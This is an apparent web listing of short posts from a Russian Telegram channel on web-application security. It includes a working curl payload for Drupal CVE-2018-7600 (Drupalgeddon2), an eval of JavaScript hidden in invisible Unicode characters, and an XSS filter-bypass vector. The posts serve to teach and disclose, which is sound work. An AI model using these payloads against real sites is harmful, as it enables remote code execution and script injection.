Кавычка

Кавычка

3319
Блоги

Уязвимости и атаки на веб-приложения. Чат об одинарных, иногда даже двойных кавычках - @WebPwnChat

По поводу публичных телеграм проксей. В разных статьях предлагают поставить прокси сервер dante и включить вход по юзерам ОС. И следующей строчкой добавляют юзера, но (!) не отрубают ему доступ по SSH и всем раскидывают ссылки на свою проксю с логином...
17 Авг 2018
curl -X POST --data \ 'form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=phpinfo()' \ 'https://localhost/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'...
17 Авг 2018
А вот и эксплойт на CVE-2018-7600 подъехал. https://research.checkpoint.com/uncovering-drupalgeddon-2/ https://github.com/a2u/CVE-2018-7600/ #drupalgeddon2 #Drupal
17 Авг 2018
Мне кажется, что я тебя уже где-то видел: https://iknowyou.bo0om.ru Открой в браузере, который ты чаще всего используешь.
17 Авг 2018
Возможно, ты уже знаешь, что открытая ссылка может изменить ту страницу, с которой ее открыли (переопределить window.opener), если target ссылки был "_blank": https://habrahabr.ru/post/164539/ Это работает и в обратную сторону. Для примера: https://bo0om.ru/google.html Если...
17 Авг 2018
Забавно, правда? О том, как это работает: https://www.stefanjudis.com/blog/hidden-messages-in-javascript-property-names/
17 Авг 2018
Javascript, который мы заслужили: eval(unescape(escape('󠅡󠅬󠅥󠅲󠅴󠄨󠄧󠅏󠅯󠅰󠅳󠄧󠄩󠄻󠅤󠄽󠅤󠅯󠅣󠅵󠅭󠅥󠅮󠅴󠄬󠄨󠅤󠄮󠅢󠅯󠅤󠅹󠅼󠅼󠅤󠄮󠅤󠅯󠅣󠅵󠅭󠅥󠅮󠅴󠅅󠅬󠅥󠅭󠅥󠅮󠅴󠄩󠄮󠅩󠅮󠅮󠅥󠅲󠅈󠅔󠅍󠅌󠄠󠄽󠄠󠄧󠄼󠅤󠅩󠅶󠄠󠅳󠅴󠅹󠅬󠅥󠄽󠄢󠅦󠅯󠅮󠅴󠄭󠅳󠅩󠅺󠅥󠄺󠄹󠄹󠄹󠄥󠄻󠅣󠅯󠅬󠅯󠅲󠄺󠅲󠅥󠅤󠄻󠄢󠄾󠅈󠅡󠅣󠅫󠅥󠅤󠄧').replace(/u.{8}/g,'')))
17 Авг 2018
Раз уж автор прошлого поста поднял речь про Internet Explorer, то я хотел бы и от себя рассказать одну интересную вещь (баян). Существует такой малоизвестны тег
17 Авг 2018
А ты знал, что в IIS возможно создать XSS пейлоад не только в форматах типа html/xml? Оказывается, что вектор для XML alert(1337) может быть загружен со следующими расширенями: .dtd .mno .vml .xsl .xht .svg .xml .xsd .xsf .svgz .xslt .wsdl .xhtml, а вектор alert(1337) будет...
17 Авг 2018
А ты используешь Burp Suite? А лицензионный? Если нет, аккуратнее там, как минимум Burp Suite Loader 1.7.31 - тот еще конь. Хотя, вполне ожидаемо, чаще всего малварь распространяется в крякнутом софте. https://0x00sec.org/t/malware-reversing-burpsuite-keygen/5167...
17 Авг 2018
Знакомые тебе форматы Microsoft Office: docx, xlsx, это zip архив, содержащий данные в виде XML (они так и называются - Office Open XML и подобны OpenDocument Format). А это значит, что если сайт обрабатывает (парсит, конвентирует) подобные файлы - есть...
17 Авг 2018
Тег вида импортирует содержимое стороннего документа на текущую страницу (вжух http://w3c.github.io/webcomponents/spec/imports/index.html). А в Google Chrome можно импортировать html из любого файла, с абсолютно любым типом контента (заголовок Content-type)...
17 Авг 2018
Ну мы тут трем за кавычки, а все что касается безопасности браузеров - на канале @br0wsec, подключайтесь :)
17 Авг 2018
DOM XSS, вектор которых был через location.hash, похоже, умрет в Chrome начиная с 65 версии
17 Авг 2018
Здравствуйте! На серверах Вашей компании найдена уязвимость чтения произвольного участка памяти в обход имеющихся привилегий. Злоумышленник может получить доступ к исходным кодам, паролям, данным пользователей, как следствие, скомпрометировать сервера...
17 Авг 2018
Вы ведь все пользуетесь nmap? А команда Vulners сделала плагин, которого всем не хватало! Теперь вы не просто можете просканировать удаленный хост, но и найти на нем уязвимости! И все это используя Nmap с плагином Vulners - https://github.com/vulnersCom/nmap-vulners...
17 Авг 2018
Особенности Safari в client-side атаках. https://bo0om.ru/safari-client-side Safari все больше напоминает IE 🤔
17 Авг 2018
А вот и презентации, в том числе с Web Village https://2017.zeronights.ru/materials/
17 Авг 2018
Синтаксис регулярных выражений в js выглядит как /pattern/flags. Но помимо флагов, можно вернуть текст шаблона (исходный) с помощью свойства source. Вжух, скрываем javascript:alert() от злых защит: location=/jav/.source+/ascript/.source+/:/.source+/alert/.source+/``/.source #XSS...
17 Авг 2018
Green Dog: Я на WebVillage буду рассказывать про баги связанные с десериализаций. Выложил пучок мини-вебприложух в докер контейнерах, чтобы можно было потыкать желающим. https://github.com/GrrrDog/ZeroNights-WebVillage-2017
17 Авг 2018